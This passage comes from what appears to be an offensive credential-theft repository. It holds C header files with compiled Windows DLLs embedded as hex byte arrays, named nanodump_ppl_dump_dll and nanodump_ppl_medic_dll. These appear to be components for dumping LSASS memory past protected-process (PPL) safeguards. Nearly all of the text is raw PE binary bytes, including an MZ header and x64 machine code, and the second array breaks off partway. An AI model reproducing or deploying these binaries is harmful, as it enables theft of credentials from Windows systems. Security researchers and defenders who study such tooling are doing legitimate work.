,0x3F,0xE0,0x3F,0xF9,0x3F,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x00,0x00,0x00,0x1C,0x30,0x38,0x30,0x44,0x30,0x81,0x30,0x9A,0x30,0xCE,0x30,0x88,0x32,0x94,0x32,0x06,0x33,0x1C,0x33,0x5E,0x33,0x8D,0x33,0xA3,0x33,0xF8,0x33,0x0E,0x34,0x7D,0x34,0x93,0x34,0x4D,0x35,0x21,0x37,0x2D,0x37,0x56,0x37,0x62,0x37,0xE8,0x37,0xF4,0x37,0xE7,0x38,0xF3,0x38,0xBD,0x3D,0xD6,0x3D,0x00,0x50,0x00,0x00,0x5C,0x00,0x00,0x00,0x74,0x30,0x80,0x30,0x02,0x31,0x0E,0x31,0x2A,0x31,0x36,0x31,0x63,0x31,0x79,0x31,0xFE,0x31,0x17,0x32,0x72,0x33,0x88,0x33,0xAC,0x33,0xE1,0x33,0xF7,0x33,0x33,0x34,0x49,0x34,0xE4,0x39,0x0A,0x3A,0x4A,0x3A,0x20,0x3B,0x3A,0x3B,0x61,0x3B,0xF2,0x3B,0xFE,0x3B,0x8A,0x3C,0xA3,0x3C,0xDF,0x3C,0xF5,0x3C,0x31,0x3D,0x4B,0x3D,0x72,0x3D,0x03,0x3E,0x0F,0x3E,0x99,0x3E,0xAF,0x3E,0xED,0x3E,0x06,0x3F,0x49,0x3F,0x63,0x3F,0x83,0x3F,0x00,0x00,0x00,0x60,0x00,0x00,0x54,0x00,0x00,0x00,0x14,0x30,0x20,0x30,0xAA,0x30,0xC0,0x30,0xFE,0x30,0x17,0x31,0xA6,0x31,0xB2,0x31,0xF3,0x36,0xFF,0x36,0xBD,0x37,0xC9,0x37,0xF2,0x37,0xFE,0x37,0x4D,0x38,0x63,0x38,0xC7,0x38,0xE0,0x38,0xFA,0x38,0x10,0x39,0x7A,0x39,0x93,0x39,0xFB,0x39,0x15,0x3A,0x75,0x3A,0x81,0x3A,0xFB,0x3A,0x14,0x3B,0x58,0x3B,0x6E,0x3B,0xF4,0x3B,0x0D,0x3C,0x9C,0x3C,0x0D,0x3D,0x23,0x3D,0xA0,0x3D,0xC9,0x3F,0xD5,0x3F,0x00,0x70,0x00,0x00,0x60,0x00,0x00,0x00,0x16,0x30,0x2C,0x30,0x69,0x30,0x7F,0x30,0xD9,0x31,0x67,0x32,0x5A,0x33,0xEB,0x33,0xF2,0x33,0xA3,0x35,0xFE,0x35,0x14,0x36,0x75,0x36,0x8E,0x36,0xD1,0x38,0xE7,0x38,0xFE,0x38,0x73,0x39,0x7F,0x39,0xA2,0x39,0xD2,0x39,0xEB,0x39,0x22,0x3A,0x6F,0x3B,0x76,0x3B,0xA6,0x3C,0xAD,0x3C,0xCA,0x3C,0xDF,0x3C,0xEB,0x3C,0x19,0x3D,0x2E,0x3D,0x3A,0x3D,0x7C,0x3D,0xB4,0x3D,0xCA,0x3D,0x32,0x3E,0x4B,0x3E,0x81,0x3E,0xFF,0x3E,0x18,0x3F,0x40,0x3F,0x72,0x3F,0xE4,0x3F,0x00,0x80,0x00,0x00,0x5C,0x00,0x00,0x00,0x89,0x30,0x91,0x30,0xAB,0x30,0xE8,0x30,0x5C,0x31,0x84,0x31,0x9B,0x31,0xCE,0x31,0xE4,0x31,0x52,0x32,0x6B,0x32,0xCB,0x32,0xE4,0x32,0x63,0x33,0x0F,0x34,0x25,0x34,0x74,0x34,0xC4,0x34,0xD7,0x35,0xE3,0x35,0xF8,0x35,0x04,0x36,0x69,0x36,0x83,0x36,0xA8,0x38,0xCB,0x38,0xD3,0x38,0x88,0x39,0x94,0x39,0x0C,0x3B,0x6B,0x3B,0x98,0x3C,0x44,0x3D,0x77,0x3E,0x8F,0x3E,0x08,0x3F,0x4A,0x3F,0x5F,0x3F,0x9B,0x3F,0xB3,0x3F,0xC0,0x3F,0x00,0x00,0x00,0x90,0x00,0x00,0x44,0x00,0x00,0x00,0x1A,0x37,0x36,0x37,0x42,0x37,0x62,0x37,0x7E,0x37,0x8A,0x37,0x5F,0x38,0x6B,0x38,0x94,0x38,0xA0,0x38,0x97,0x39,0x05,0x3A,0x1B,0x3A,0x83,0x3A,0x9C,0x3A,0x2F,0x3B,0x4E,0x3B,0x64,0x3B,0xB9,0x3B,0xB0,0x3C,0xC9,0x3C,0x2A,0x3D,0x43,0x3D,0x84,0x3D,0x9D,0x3D,0x24,0x3E,0x30,0x3E,0x4E,0x3E,0x5A,0x3E,0x00,0x00,0x00,0xA0,0x00,0x00,0x10,0x00,0x00,0x00,0xA7,0x35,0x1E,0x3D,0x38,0x3D,0x00,0x00,0x00,0xB0,0x00,0x00,0xC8,0x00,0x00,0x00,0x65,0x30,0x7B,0x30,0x57,0x31,0x70,0x31,0xAE,0x31,0xC7,0x31,0xB0,0x33,0xBC,0x33,0xEC,0x33,0x25,0x34,0xB3,0x34,0xBB,0x34,0xDA,0x34,0xE2,0x34,0x0D,0x35,0x15,0x35,0x34,0x35,0x3C,0x35,0x59,0x35,0x65,0x35,0xD4,0x35,0xDC,0x35,0xFB,0x35,0x03,0x36,0x20,0x36,0x2C,0x36,0x84,0x36,0x8C,0x36,0xAB,0x36,0xB3,0x36,0xDE,0x36,0xEA,0x36,0x12,0x37,0x6B,0x37,0x77,0x37,0x38,0x39,0x11,0x3A,0x2B,0x3A,0x37,0x3A,0x59,0x3A,0x73,0x3A,0x7F,0x3A,0xA0,0x3A,0xB1,0x3A,0xC2,0x3A,0x19,0x3B,0x25,0x3B,0x49,0x3B,0x4F,0x3B,0x65,0x3B,0xED,0x3B,0x2D,0x3C,0x3A,0x3C,0x79,0x3C,0x95,0x3C,0xB4,0x3C,0xD8,0x3C,0x00,0x3D,0x1B,0x3D,0x28,0x3D,0x2F,0x3D,0x48,0x3D,0x5A,0x3D,0x6E,0x3D,0x8B,0x3D,0xA2,0x3D,0xC6,0x3D,0xD8,0x3D,0xDD,0x3D,0xE2,0x3D,0xED,0x3D,0xFB,0x3D,0x25,0x3E,0x4C,0x3E,0x81,0x3E,0x8A,0x3E,0x99,0x3E,0xA4,0x3E,0xAA,0x3E,0xC7,0x3E,0xF9,0x3E,0x11,0x3F,0x16,0x3F,0x1E,0x3F,0x29,0x3F,0x3B,0x3F,0x80,0x3F,0x86,0x3F,0xA2,0x3F,0xB1,0x3F,0xB7,0x3F,0xD2,0x3F,0xD8,0x3F,0xE3,0x3F,0xE9,0x3F,0xF4,0x3F,0x00,0xC0,0x00,0x00,0x20,0x01,0x00,0x00,0x02,0x30,0x12,0x30,0x41,0x30,0x56,0x30,0x66,0x30,0x7C,0x30,0x82,0x30,0x88,0x30,0x95,0x30,0xAE,0x30,0xCC,0x30,0xD2,0x30,0xF1,0x30,0x2F,0x31,0x35,0x31,0x3A,0x31,0x40,0x31,0x4D,0x31,0x53,0x31,0x78,0x31,0x93,0x31,0x99,0x31,0x9E,0x31,0xD3,0x31,0xD9,0x31,0xF2,0x31,0x1A,0x32,0x28,0x32,0x46,0x32,0x59,0x32,0x62,0x32,0x6D,0x32,0x8B,0x32,0x95,0x32,0xA0,0x32,0xA6,0x32,0xD3,0x32,0xD9,0x32,0x8E,0x33,0x98,0x33,0x9E,0x33,0xA8,0x33,0xB1,0x33,0xBC,0x33,0x25,0x34,0x2F,0x34,0x35,0x34,0x3F,0x34,0x53,0x34,0x5F,0x34,0x6D,0x34,0x77,0x34,0xB5,0x34,0xBF,0x34,0xC5,0x34,0xD3,0x34,0xDE,0x34,0xF6,0x34,0x06,0x35,0x0C,0x35,0x16,0x35,0x2B,0x35,0x36,0x35,0x3D,0x35,0x75,0x35,0x7F,0x35,0x85,0x35,0x93,0x35,0x9A,0x35,0xB5,0x35,0xBE,0x35,0xC4,0x35,0xCE,0x35,0xE3,0x35,0xEF,0x35,0x04,0x36,0x46,0x36,0x57,0x36,0x5D,0x36,0x67,0x36,0x7B,0x36,0x85,0x36,0xC9,0x36,0xF0,0x36,0x71,0x38,0x77,0x38,0x86,0x38,0x8F,0x38,0x9B,0x38,0xB1,0x38,0xC2,0x38,0x4A,0x39,0x5B,0x39,0x86,0x39,0x8C,0x39,0x97,0x39,0xA0,0x39,0xA5,0x39,0xB5,0x39,0xCA,0x39,0xDB,0x39,0x06,0x3A,0x0C,0x3A,0x17,0x3A,0x20,0x3A,0x25,0x3A,0x35,0x3A,0x4C,0x3A,0xD2,0x3B,0xDA,0x3B,0xE2,0x3B,0xEA,0x3B,0xF2,0x3B,0xFA,0x3B,0x02,0x3C,0x0A,0x3C,0x12,0x3C,0x1A,0x3C,0x22,0x3C,0x2A,0x3C,0x32,0x3C,0x3A,0x3C,0x42,0x3C,0x4A,0x3C,0x52,0x3C,0x5A,0x3C,0x62,0x3C,0x6A,0x3C,0x72,0x3C,0x7A,0x3C,0x82,0x3C,0x8A,0x3C,0x92,0x3C,0x9A,0x3C,0xA2,0x3C,0xAA,0x3C,0xB2,0x3C,0xBA,0x3C,0xC2,0x3C,0x64,0x3D,0x00,0xD0,0x00,0x00,0x3C,0x00,0x00,0x00,0x20,0x30,0x24,0x30,0x28,0x30,0x2C,0x30,0x30,0x30,0x34,0x30,0x38,0x30,0x3C,0x30,0x40,0x30,0x44,0x30,0x48,0x30,0x4C,0x30,0x50,0x30,0x54,0x30,0x58,0x30,0x5C,0x30,0x60,0x30,0x64,0x30,0x80,0x30,0x90,0x30,0x94,0x30,0x98,0x30,0x9C,0x30,0xA0,0x30,0xA4,0x30,0x00,0x00,0x00,0xE0,0x00,0x00,0x14,0x00,0x00,0x00,0xC4,0x3C,0xC8,0x3C,0xCC,0x3C,0xD0,0x3C,0xD4,0x3C,0x00,0x00,0x00,0x70,0x01,0x00,0x10,0x00,0x00,0x00,0x0C,0x30,0x18,0x30,0x1C,0x30,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0E,0x00,0x00,0x00,0x2E,0x65,0x68,0x5F,0x66,0x72,0x61,0x6D,0x65,0x00,};
unsigned int nanodump_ppl_dump_dll_len = 68110;


================================================
FILE: Creds-BOF/nanodump/include/nanodump_ppl_medic_dll.x64.h
================================================
#pragma once

unsigned char nanodump_ppl_medic_dll[] = {0x4D,0x5A,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xFF,0xFF,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x00,0x00,0x00,0x0E,0x1F,0xBA,0x0E,0x00,0xB4,0x09,0xCD,0x21,0xB8,0x01,0x4C,0xCD,0x21,0x54,0x68,0x69,0x73,0x20,0x70,0x72,0x6F,0x67,0x72,0x61,0x6D,0x20,0x63,0x61,0x6E,0x6E,0x6F,0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6E,0x20,0x69,0x6E,0x20,0x44,0x4F,0x53,0x20,0x6D,0x6F,0x64,0x65,0x2E,0x0D,0x0D,0x0A,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x45,0x00,0x00,0x64,0x86,0x0B,0x00,0xB8,0x79,0x7A,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xF0,0x00,0x2E,0x22,0x0B,0x02,0x02,0x29,0x00,0xE2,0x00,0x00,0x00,0x1A,0x01,0x00,0x00,0x24,0x00,0x00,0x40,0x13,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0xAD,0x68,0x03,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x01,0x00,0x00,0x04,0x00,0x00,0xE8,0x2C,0x01,0x00,0x03,0x00,0x60,0x01,0x00,0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x70,0x01,0x00,0x55,0x00,0x00,0x00,0x00,0x80,0x01,0x00,0x14,0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x01,0x00,0x40,0x0B,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xB0,0x01,0x00,0x60,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xA0,0x17,0x01,0x00,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xB0,0x81,0x01,0x00,0x70,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2E,0x74,0x65,0x78,0x74,0x00,0x00,0x00,0x78,0xE1,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0xE2,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x60,0x2E,0x64,0x61,0x74,0x61,0x00,0x00,0x00,0x70,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x02,0x00,0x00,0x00,0xE6,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,0x2E,0x72,0x64,0x61,0x74,0x61,0x00,0x00,0xA0,0x0E,0x00,0x00,0x00,0x10,0x01,0x00,0x00,0x10,0x00,0x00,0x00,0xE8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2E,0x70,0x64,0x61,0x74,0x61,0x00,0x00,0x40,0x0B,0x00,0x00,0x00,0x20,0x01,0x00,0x00,0x0C,0x00,0x00,0x00,0xF8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2E,0x78,0x64,0x61,0x74,0x61,0x00,0x00,0x24,0x09,0x00,0x00,0x00,0x30,0x01,0x00,0x00,0x0A,0x00,0x00,0x00,0x04,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2E,0x62,0x73,0x73,0x00,0x00,0x00,0x00,0x90,0x23,0x00,0x00,0x00,0x40,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x00,0x00,0xC0,0x2E,0x65,0x64,0x61,0x74,0x61,0x00,0x00,0x55,0x00,0x00,0x00,0x00,0x70,0x01,0x00,0x00,0x02,0x00,0x00,0x00,0x0E,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2E,0x69,0x64,0x61,0x74,0x61,0x00,0x00,0x14,0x06,0x00,0x00,0x00,0x80,0x01,0x00,0x00,0x08,0x00,0x00,0x00,0x10,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,0x2E,0x43,0x52,0x54,0x00,0x00,0x00,0x00,0x58,0x00,0x00,0x00,0x00,0x90,0x01,0x00,0x00,0x02,0x00,0x00,0x00,0x18,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,0x2E,0x74,0x6C,0x73,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0xA0,0x01,0x00,0x00,0x02,0x00,0x00,0x00,0x1A,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,0x2E,0x72,0x65,0x6C,0x6F,0x63,0x00,0x00,0x60,0x00,0x00,0x00,0x00,0xB0,0x01,0x00,0x00,0x02,0x00,0x00,0x00,0x1C,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x42,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x0D,0xF9,0x2F,0x01,0x00,0xE9,0x64,0xDE,0x00,0x00,0x0F,0x1F,0x40,0x00,0x55,0x41,0x56,0x41,0x55,0x41,0x54,0x57,0x56,0x53,0x48,0x83,0xEC,0x20,0x48,0x8D,0x6C,0x24,0x20,0x48,0x89,0xCF,0x4D,0x89,0xC4,0x85,0xD2,0x0F,0x85,0x7F,0x00,0x00,0x00,0x8B,0x05,0xE1,0x2F,0x01,0x00,0x85,0xC0,0x7E,0x5E,0x83,0xE8,0x01,0x48,0x8B,0x1D,0x7B,0x09,0x01,0x00,0x45,0x31,0xE4,0xBF,0x01,0x00,0x00,0x00,0x89,0x05,0xC5,0x2F,0x01,0x00,0x4C,0x8B,0x2D,0xA6,0x71,0x01,0x00,0xEB,0x0C,0x0F,0x1F,0x40,0x00,0xB9,0xE8,0x03,0x00,0x00,0x41,0xFF,0xD5,0x4C,0x89,0xE0,0xF0,0x48,0x0F,0xB1,0x3B,0x48,0x89,0xC6,0x48,0x85,0xC0,0x75,0xE8,0x48,0x8B,0x3D,0x51,0x09,0x01,0x00,0x8B,0x07,0x83,0xF8,0x02,0x0F,0x84,0xC6,0x00,0x00,0x00,0xB9,0x1F,0x00,0x00,0x00,0xE8,0x54,0xDF,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x89,0xD0,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5F,0x41,0x5C,0x41,0x5D,0x41,0x5E,0x5D,0xC3,0x66,0x0F,0x1F,0x44,0x00,0x00,0x83,0xFA,0x01,0x75,0xDF,0x65,0x48,0x8B,0x04,0x25,0x30,0x00,0x00,0x00,0x48,0x8B,0x1D,0xFB,0x08,0x01,0x00,0x48,0x8B,0x70,0x08,0x45,0x31,0xED,0x4C,0x8B,0x35,0x2D,0x71,0x01,0x00,0xEB,0x14,0x0F,0x1F,0x00,0x48,0x39,0xC6,0x0F,0x84,0x8F,0x00,0x00,0x00,0xB9,0xE8,0x03,0x00,0x00,0x41,0xFF,0xD6,0x4C,0x89,0xE8,0xF0,0x48,0x0F,0xB1,0x33,0x48,0x85,0xC0,0x75,0xE2,0x45,0x31,0xED,0x48,0x8B,0x35,0xD0,0x08,0x01,0x00,0x8B,0x06,0x83,0xF8,0x01,0x0F,0x84,0xC5,0x00,0x00,0x00,0x8B,0x06,0x85,0xC0,0x74,0x7F,0x8B,0x06,0x83,0xF8,0x01,0x0F,0x84,0x94,0x00,0x00,0x00,0x45,0x85,0xED,0x74,0x5F,0x48,0x8B,0x05,0x58,0x08,0x01,0x00,0x48,0x8B,0x00,0x48,0x85,0xC0,0x74,0x0D,0x4D,0x89,0xE0,0xBA,0x02,0x00,0x00,0x00,0x48,0x89,0xF9,0xFF,0xD0,0x83,0x05,0xD4,0x2E,0x01,0x00,0x01,0xBA,0x01,0x00,0x00,0x00,0xE9,0x4B,0xFF,0xFF,0xFF,0x66,0x90,0x48,0x8D,0x0D,0xA9,0x2E,0x01,0x00,0xE8,0x14,0xDE,0x00,0x00,0xC7,0x07,0x00,0x00,0x00,0x00,0x48,0x87,0x33,0xE9,0x2A,0xFF,0xFF,0xFF,0x66,0x0F,0x1F,0x44,0x00,0x00,0x41,0xBD,0x01,0x00,0x00,0x00,0xEB,0x81,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x31,0xC0,0x48,0x87,0x03,0xEB,0x9A,0x66,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x15,0x79,0x08,0x01,0x00,0x48,0x8B,0x0D,0x62,0x08,0x01,0x00,0xC7,0x06,0x01,0x00,0x00,0x00,0xE8,0x47,0xDE,0x00,0x00,0xE9,0x63,0xFF,0xFF,0xFF,0x66,0x90,0x48,0x8B,0x15,0x39,0x08,0x01,0x00,0x48,0x8B,0x0D,0x22,0x08,0x01,0x00,0xE8,0x2D,0xDE,0x00,0x00,0xC7,0x06,0x02,0x00,0x00,0x00,0xE9,0x4E,0xFF,0xFF,0xFF,0x66,0x90,0xB9,0x1F,0x00,0x00,0x00,0xE8,0x0E,0xDE,0x00,0x00,0xE9,0x32,0xFF,0xFF,0xFF,0x90,0x55,0x41,0x55,0x41,0x54,0x57,0x56,0x53,0x48,0x83,0xEC,0x28,0x48,0x8D,0x6C,0x24,0x20,0x4C,0x8B,0x25,0xB8,0x07,0x01,0x00,0x48,0x89,0xCE,0x41,0x89,0x14,0x24,0x89,0xD3,0x4C,0x89,0xC7,0x85,0xD2,0x75,0x60,0x8B,0x05,0x0A,0x2E,0x01,0x00,0x85,0xC0,0x74,0x36,0xE8,0x69,0xD1,0x00,0x00,0x49,0x89,0xF8,0x31,0xD2,0x48,0x89,0xF1,0xE8,0x63,0xCD,0x00,0x00,0x49,0x89,0xF8,0x89,0xDA,0x48,0x89,0xF1,0xE8,0x9F,0xDB,0x00,0x00,0x49,0x89,0xF8,0x89,0xDA,0x48,0x89,0xF1,0x41,0x89,0xC5,0xE8,0xCF,0xFD,0xFF,0xFF,0x85,0xC0,0x75,0x06,0x0F,0x1F,0x00,0x45,0x31,0xED,0x44,0x89,0xE8,0x41,0xC7,0x04,0x24,0xFF,0xFF,0xFF,0xFF,0x48,0x83,0xC4,0x28,0x5B,0x5E,0x5F,0x41,0x5C,0x41,0x5D,0x5D,0xC3,0x0F,0x1F,0x44,0x00,0x00,0xE8,0x13,0xD1,0x00,0x00,0x8D,0x43,0xFF,0x49,0x89,0xF8,0x89,0xDA,0x48,0x89,0xF1,0x83,0xF8,0x01,0x77,0x3B,0xE8,0x8E,0xFD,0xFF,0xFF,0x85,0xC0,0x74,0xC2,0x49,0x89,0xF8,0x89,0xDA,0x48,0x89,0xF1,0xE8,0x3D,0xDB,0x00,0x00,0x85,0xC0,0x74,0x39,0x83,0xFB,0x01,0x74,0x54,0x49,0x89,0xF8,0xBA,0x02,0x00,0x00,0x00,0x48,0x89,0xF1,0xE8,0xDB,0xCC,0x00,0x00,0x41,0x89,0xC5,0xEB,0x9A,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0xE8,0xCA,0xCC,0x00,0x00,0x41,0x89,0xC5,0x83,0xFB,0x03,0x75,0x86,0xE9,0x5A,0xFF,0xFF,0xFF,0x66,0x0F,0x1F,0x44,0x00,0x00,0x83,0xFB,0x01,0x0F,0x85,0x6F,0xFF,0xFF,0xFF,0x49,0x89,0xF8,0x31,0xD2,0x48,0x89,0xF1,0xE8,0x2A,0xFD,0xFF,0xFF,0xE9,0x5D,0xFF,0xFF,0xFF,0x0F,0x1F,0x44,0x00,0x00,0xE8,0xBB,0xCD,0x00,0x00,0x49,0x89,0xF8,0xBA,0x01,0x00,0x00,0x00,0x48,0x89,0xF1,0xE8,0x82,0xCC,0x00,0x00,0x41,0x89,0xC5,0x85,0xC0,0x0F,0x85,0x3B,0xFF,0xFF,0xFF,0x49,0x89,0xF8,0x31,0xD2,0x48,0x89,0xF1,0xE8,0x6A,0xCC,0x00,0x00,0x49,0x89,0xF8,0x31,0xD2,0x48,0x89,0xF1,0xE8,0xA6,0xDA,0x00,0x00,0x49,0x89,0xF8,0x31,0xD2,0x48,0x89,0xF1,0xE8,0xD9,0xFC,0xFF,0xFF,0xE9,0x0F,0xFF,0xFF,0xFF,0x0F,0x1F,0x40,0x00,0x48,0x8B,0x05,0x59,0x06,0x01,0x00,0xC7,0x00,0x00,0x00,0x00,0x00,0xE9,0x8E,0xFE,0xFF,0xFF,0x66,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x0F,0x1F,0x00,0x48,0x89,0xCA,0x48,0x8D,0x0D,0x96,0x2C,0x01,0x00,0xE9,0x21,0xDB,0x00,0x00,0x90,0x48,0x8D,0x0D,0x09,0x00,0x00,0x00,0xE9,0xE4,0xFF,0xFF,0xFF,0x0F,0x1F,0x40,0x00,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x10,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x48,0x83,0x7D,0x18,0x00,0x75,0x06,0x48,0x8B,0x45,0x18,0xEB,0x3E,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x28,0x48,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x20,0x48,0x01,0xD0,0x48,0x89,0x45,0xF8,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x18,0x48,0x89,0xC1,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x20,0x48,0x01,0xC8,0x48,0x29,0xC2,0x48,0x8B,0x45,0xF8,0x48,0x01,0xD0,0x48,0x83,0xC4,0x10,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x38,0x48,0x8D,0x6C,0x24,0x30,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0x44,0x89,0x45,0x30,0x4C,0x89,0x4D,0x38,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x20,0x41,0xB8,0x60,0x07,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x26,0xDC,0x00,0x00,0x48,0x8B,0x45,0x28,0xBA,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD5,0xD9,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x45,0x20,0x48,0x8B,0x55,0x28,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x67,0xDC,0x00,0x00,0x48,0x8B,0x45,0x28,0xBA,0x5C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x5E,0xDC,0x00,0x00,0x48,0x85,0xC0,0x74,0x40,0x48,0x8B,0x45,0x28,0xBA,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x98,0xD9,0x00,0x00,0x48,0x89,0xC3,0x48,0x8B,0x45,0x28,0xBA,0x5C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x34,0xDC,0x00,0x00,0x48,0x8D,0x50,0x02,0x48,0x8B,0x45,0x20,0x48,0x05,0x08,0x02,0x00,0x00,0x49,0x89,0xD8,0x48,0x89,0xC1,0xE8,0x13,0xDC,0x00,0x00,0xEB,0x2E,0x